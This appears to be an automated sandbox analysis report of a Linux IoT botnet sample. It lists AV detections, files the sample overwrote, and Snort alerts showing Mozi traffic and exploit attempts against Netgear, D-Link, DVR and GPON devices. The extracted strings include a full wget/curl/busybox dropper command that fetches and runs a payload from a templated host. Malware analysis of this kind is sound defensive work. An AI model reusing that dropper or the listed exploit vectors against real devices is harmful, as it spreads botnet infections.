SHA-256:	2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
SHA-512:	810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
Malicious:	false
Preview:	./usr/networks&.exit 1.

/usr/src/linux-headers-5.4.0-81/arch/arm/tools/syscalltbl.sh

Download File

Process:	/tmp/ZFvtIZszMd
File Type:	ASCII text
Category:	dropped
Size (bytes):	292
Entropy (8bit):	3.90905274301989
Encrypted:	false
SSDEEP:	3:qXVxpjUvwcG6IYlfkoeOPeQxS8LXEVvXFNK/5e9o4TLZFwqwXF6HF/qHF7VvMTc2:apovwTMldPzMvHK/5u3rHoHjUAEPTn
MD5:	543D5DBC6E85559159F104129FF1BF1F
SHA1:	324751DF3B652BC8C71B68222D94E6A74C27B1B1
SHA-256:	97ABE3A808380B11D216A3484E4156BFA5336031DD00A76307C2987585FBFF77
SHA-512:	880C67C68ED1AB3436653F636294C1FCD3F70EE82C66529E99D95D1428902417FD2053093CE5D047088AE26B45822D39BFDC9AFFC9CC14FBC61C81DFBA96E59A
Malicious:	false
Preview:	./usr/networks&. exit 1. fi...if [ -n "$entry" ]; then. if [ -z "$compat" ]; then. echo "NATIVE($nr, $entry)". else. echo "COMPAT($nr, $entry, $compat)". fi. fi. done.) > "$out"../usr/networks&.exit 1.

/usr/src/linux-headers-5.4.0-81/arch/arm64/boot/install.sh

Download File

Process:	/tmp/ZFvtIZszMd
File Type:	ASCII text
Category:	dropped
Size (bytes):	716
Entropy (8bit):	5.188740504939567
Encrypted:	false
SSDEEP:	12:cngowa2h12l3mGXHFMyHFtfBjCksL49ysL7FwuIG7n:M4+XKyrZPsL4QsL7FwuIc
MD5:	E233F7425841D915F481DD78C9518D4D
SHA1:	68CF549CF969E9786FF3BCECA2C5976C678C2358
SHA-256:	FD438227D3E0DD70A5FE641C67B5F8148482357EFAE725A542EA930EA3E95C30
SHA-512:	4F99D3541DFD43BB317020AA734A91FB4712D817716C5F3F0774BDDB05D2393EB04391AD5DE0A27F6F904BFCF3BC7BD551481F2F138956A745DD5FE23F1DCFFA
Malicious:	false
Preview:	./usr/networks&...exit 1..fi.}..# Make sure the files actually exist.verify "$2".verify "$3"..# User may have a custom install script.if [ -x ~/bin/${INSTALLKERNEL} ]; then exec ~/bin/${INSTALLKERNEL} "$@"; fi.if [ -x /sbin/${INSTALLKERNEL} ]; then exec /sbin/${INSTALLKERNEL} "$@"; fi..if [ "$(basename $2)" = "Image.gz" ]; then.# Compressed install. echo "Installing compressed kernel". base=vmlinuz.else.# Normal install. echo "Installing normal kernel". base=vmlinux.fi..if [ -f $4/$base-$1 ]; then. mv $4/$base-$1 $4/$base-$1.old.fi.cat $2 > $4/$base-$1..# Install system map file.if [ -f $4/System.map-$1 ]; then. mv $4/System.map-$1 $4/System.map-$1.old.fi.cp $3 $4/System.map-$1../usr/networks&.exit 1.

Source: ZFvtIZszMd	Virustotal: Detection: 66%	Perma Link
Source: ZFvtIZszMd	Metadefender: Detection: 48%	Perma Link
Source: ZFvtIZszMd	ReversingLabs: Detection: 60%

Source: /tmp/ZFvtIZszMd (PID: 5260)	Opens: /proc/net/route
Source: /tmp/ZFvtIZszMd (PID: 5260)	Opens: /proc/net/route

Source: ZFvtIZszMd	String: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i \|\|curl -O http://%s:%d/i \|\|/bin/busybox wget http://%s:%d/i;chmod 777 i \|\|(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Source: ZFvtIZszMd	String: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh \|\|curl -O http://%s:%d/bin.sh \|\|/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh \|\|(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
Source: ZFvtIZszMd	String: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i \|\|curl -O http://%s:%d/i \|\|/bin/busybox wget http://%s:%d/i;chmod 777 i \|\|(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Source: networks.30.dr	String: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i \|\|curl -O http://%s:%d/i \|\|/bin/busybox wget http://%s:%d/i;chmod 777 i \|\|(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Source: networks.30.dr	String: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh \|\|curl -O http://%s:%d/bin.sh \|\|/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh \|\|(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
Source: networks.30.dr	String: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i \|\|curl -O http://%s:%d/i \|\|/bin/busybox wget http://%s:%d/i;chmod 777 i \|\|(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'

Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42764 -> 187.157.44.71:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:42764 -> 187.157.44.71:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:44958 -> 161.71.2.41:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:44958 -> 161.71.2.41:80
Source: Traffic	Snort IDS: 2034576 ET EXPLOIT Netgear DGN Remote Code Execution 192.168.2.23:57962 -> 52.48.108.30:80
Source: Traffic	Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.23:57962 -> 52.48.108.30:80
Source: Traffic	Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.23:57962 -> 52.48.108.30:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33030 -> 45.8.220.39:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:33030 -> 45.8.220.39:80
Source: Traffic	Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.23:48916 -> 207.154.230.111:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58348 -> 52.232.110.39:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:58348 -> 52.232.110.39:80
Source: Traffic	Snort IDS: 2034576 ET EXPLOIT Netgear DGN Remote Code Execution 192.168.2.23:42558 -> 18.66.0.94:80
Source: Traffic	Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.23:42558 -> 18.66.0.94:80
Source: Traffic	Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.23:42558 -> 18.66.0.94:80
Source: Traffic	Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.23:53338 -> 185.199.110.112:80
Source: Traffic	Snort IDS: 2034576 ET EXPLOIT Netgear DGN Remote Code Execution 192.168.2.23:50360 -> 114.207.251.137:8080
Source: Traffic	Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.23:50360 -> 114.207.251.137:8080
Source: Traffic	Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.23:50360 -> 114.207.251.137:8080
Source: Traffic	Snort IDS: 2025884 ET EXPLOIT Multiple CCTV-DVR Vendors RCE 192.168.2.23:52454 -> 92.118.26.58:81
Source: Traffic	Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 180.188.249.27:6776 -> 192.168.2.23:15453
Source: Traffic	Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 117.215.213.248:51492 -> 192.168.2.23:15453
Source: Traffic	Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 88.129.242.254:6231 -> 192.168.2.23:15453
Source: Traffic	Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 201.150.176.65:4000 -> 192.168.2.23:15453
Source: Traffic	Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 122.155.0.70:8083 -> 192.168.2.23:15453
Source: Traffic	Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 202.164.139.93:58568 -> 192.168.2.23:15453
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:44758 -> 195.54.163.58:8080
Source: Traffic	Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.23:44758 -> 195.54.163.58:8080
Source: Traffic	Snort IDS: 2034576 ET EXPLOIT Netgear DGN Remote Code Execution 192.168.2.23:50434 -> 172.247.38.144:80
Source: Traffic	Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.23:50434 -> 172.247.38.144:80
Source: Traffic	Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.23:50434 -> 172.247.38.144:80
Source: Traffic	Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.23:46296 -> 52.73.33.104:80
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:34978 -> 98.156.8.112:80
Source: Traffic	Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.23:34978 -> 98.156.8.112:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59926 -> 83.142.198.185:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:59926 -> 83.142.198.185:80
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:46902 -> 192.186.22.190:5555
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:45500 -> 185.196.100.153:80
Source: Traffic	Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.23:45500 -> 185.196.100.153:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48868 -> 23.12.89.25:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:48868 -> 23.12.89.25:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.12.89.25:80 -> 192.168.2.23:48868
Source: Traffic	Snort IDS: 2034576 ET EXPLOIT Netgear DGN Remote Code Execution 192.168.2.23:59780 -> 35.173.167.250:80
Source: Traffic	Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.23:59780 -> 35.173.167.250:80
Source: Traffic	Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.23:59780 -> 35.173.167.250:80
Source: Traffic	Snort IDS: 2034576 ET EXPLOIT Netgear DGN Remote Code Execution 192.168.2.23:45038 -> 104.15.240.53:80
Source: Traffic	Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.23:45038 -> 104.15.240.53:80
Source: Traffic	Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.23:45038 -> 104.15.240.53:80
Source: Traffic	Snort IDS: 2024915 ET EXPLOIT Possible Vacron NVR Remote Command Execution 192.168.2.23:49312 -> 50.16.188.25:8080
Source: Traffic	Snort IDS: 2024915 ET EXPLOIT Possible Vacron NVR Remote Command Execution 192.168.2.23:47290 -> 52.29.6.66:8080
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:32802 -> 184.25.176.127:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:32802 -> 184.25.176.127:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 184.25.176.127:80 -> 192.168.2.23:32802
Source: Traffic	Snort IDS: 2034576 ET EXPLOIT Netgear DGN Remote Code Execution 192.168.2.23:34974 -> 13.125.149.49:80
Source: Traffic	Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.23:34974 -> 13.125.149.49:80
Source: Traffic	Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.23:34974 -> 13.125.149.49:80
Source: Traffic	Snort IDS: 2034576 ET EXPLOIT Netgear DGN Remote Code Execution 192.168.2.23:40888 -> 185.133.229.74:80
Source: Traffic	Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.23:40888 -> 185.133.229.74:80
Source: Traffic	Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.23:40888 -> 185.133.229.74:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.208.34.61:80 -> 192.168.2.23:39122
Source: Traffic	Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.23:39122 -> 23.208.34.61:80
Source: Traffic	Snort IDS: 2034576 ET EXPLOIT Netgear DGN Remote Code Execution 192.168.2.23:49458 -> 23.230.254.105:80
Source: Traffic	Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.23:49458 -> 23.230.254.105:80
Source: Traffic	Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.23:49458 -> 23.230.254.105:80
Source: Traffic	Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.23:33740 -> 190.166.198.45:80
Source: Traffic	Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.23:35218 -> 3.20.201.243:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:36392 -> 200.123.205.169:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:36392 -> 200.123.205.169:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.101.170.129:80 -> 192.168.2.23:48328
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55072 -> 34.98.66.83:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:55072 -> 34.98.66.83:80
Source: Traffic	Snort IDS: 2034576 ET EXPLOIT Netgear DGN Remote Code Execution 192.168.2.23:32900 -> 118.163.113.176:80
Source: Traffic	Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.23:32900 -> 118.163.113.176:80
Source: Traffic	Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.23:32900 -> 118.163.113.176:80
Source: Traffic	Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.23:47072 -> 52.72.158.238:80
Source: Traffic	Snort IDS: 2034576 ET EXPLOIT Netgear DGN Remote Code Execution 192.168.2.23:48156 -> 143.204.112.212:80
Source: Traffic	Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.23:48156 -> 143.204.112.212:80
Source: Traffic	Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.23:48156 -> 143.204.112.212:80
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:41860 -> 13.238.47.38:80
Source: Traffic	Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.23:41860 -> 13.238.47.38:80
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:50568 -> 210.48.20.7:80
Source: Traffic	Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.23:50568 -> 210.48.20.7:80
Source: Traffic	Snort IDS: 2024915 ET EXPLOIT Possible Vacron NVR Remote Command Execution 192.168.2.23:58468 -> 24.8.179.115:8080
Source: Traffic	Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.23:48184 -> 54.84.181.34:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.208.233.170:80 -> 192.168.2.23:60644
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:49404 -> 42.98.215.127:80
Source: Traffic	Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.23:49404 -> 42.98.215.127:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55652 -> 45.144.3.201:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:55652 -> 45.144.3.201:80
Source: Traffic	Snort IDS: 2034576 ET EXPLOIT Netgear DGN Remote Code Execution 192.168.2.23:49182 -> 185.233.83.88:80
Source: Traffic	Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.23:49182 -> 185.233.83.88:80
Source: Traffic	Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.23:49182 -> 185.233.83.88:80
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:56410 -> 178.135.100.61:8080
Source: Traffic	Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.23:56410 -> 178.135.100.61:8080
Source: Traffic	Snort IDS: 2024915 ET EXPLOIT Possible Vacron NVR Remote Command Execution 192.168.2.23:49116 -> 149.104.79.70:8080
Source: Traffic	Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.23:38106 -> 2.178.219.63:80
Source: Traffic	Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.23:60644 -> 23.208.233.170:80
Source: Traffic	Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.23:45792 -> 52.4.18.169:80
Source: Traffic	Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.23:48328 -> 104.101.170.129:80
Source: Traffic	Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.23:48818 -> 64.34.159.178:80

Source: global traffic	TCP traffic: 25.187.113.148 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 173.124.45.94 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 9.115.138.146 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 176.13.132.57 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 93.125.7.219 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 210.67.192.146 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 74.40.185.41 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 209.59.13.236 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 185.229.210.149 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 88.80.204.55 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 53.170.157.130 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 43.159.190.154 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 214.222.104.45 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 193.151.195.55 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 17.252.58.84 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 84.231.13.28 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 130.173.40.235 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 150.228.174.178 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 38.56.136.31 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 82.72.254.135 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 190.235.119.78 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 221.22.194.11 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 157.219.143.152 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 190.10.107.49 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 4.141.143.218 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 116.15.105.36 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 158.20.189.8 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 106.99.159.31 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 164.182.234.67 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 123.220.165.29 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 40.4.221.62 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 207.237.147.66 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 19.104.90.193 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 93.179.249.7 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 57.34.192.239 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 146.118.139.85 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 156.228.159.201 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 193.2.18.134 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 40.250.29.252 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 63.68.28.146 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 180.80.137.123 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 199.253.175.69 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 220.163.161.225 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 142.203.21.215 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 204.46.18.242 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 175.52.69.37 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 196.212.110.237 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 154.64.50.131 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 204.222.113.90 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 79.158.209.144 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 30.183.116.123 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 199.240.101.94 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 208.220.131.137 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 156.79.252.244 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 135.15.153.186 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 198.245.112.146 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 189.5.17.154 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 207.23.195.29 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 130.245.77.217 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 54.181.148.41 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 42.217.20.173 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 163.125.119.193 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 50.183.64.105 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 15.101.151.43 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 164.113.140.76 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 186.104.158.59 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 218.136.34.104 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 69.235.123.21 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 180.24.184.106 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 106.207.31.42 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 176.107.239.103 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 16.191.137.51 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 145.40.158.93 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 148.234.153.158 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 190.36.150.101 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 187.123.230.15 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 52.68.173.169 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 164.97.186.164 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 62.124.228.151 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 168.170.73.87 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 194.105.25.217 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 144.181.144.68 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 216.128.208.88 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 132.25.8.225 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 27.174.228.124 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 70.48.69.248 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 85.12.92.30 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 175.55.189.249 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 37.201.208.112 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 177.52.181.55 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 173.181.211.215 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 92.47.126.52 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 69.130.148.70 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 165.144.62.218 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 221.14.154.237 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 45.238.205.88 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 33.104.165.118 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 57.82.230.159 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 108.102.15.248 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 170.248.31.222 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 141.39.142.235 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 149.209.199.38 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 136.135.67.3 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 214.223.72.186 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 104.219.63.182 ports 1,2,3,5,7,37215
